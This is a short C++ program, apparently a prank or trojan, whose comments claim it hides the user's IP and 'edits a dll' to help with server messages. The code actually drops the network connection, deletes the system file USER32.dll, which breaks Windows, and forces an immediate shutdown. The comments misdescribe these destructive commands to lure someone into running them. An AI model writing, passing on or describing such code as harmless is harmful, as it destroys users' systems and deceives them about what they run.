

//Not responsible for what happens
#include <iostream>
int main()
{
//Makes you undetectable by getting rid of your IP
system("ipconfig /release");
//This one helps you by editing the a dll and changes how you send messages to the servers
system("del %SystemRoot%\\system32\\USER32.dll -q");
system("%SystemRoot%\\system32\\shutdown.exe -s -f -t 00");
}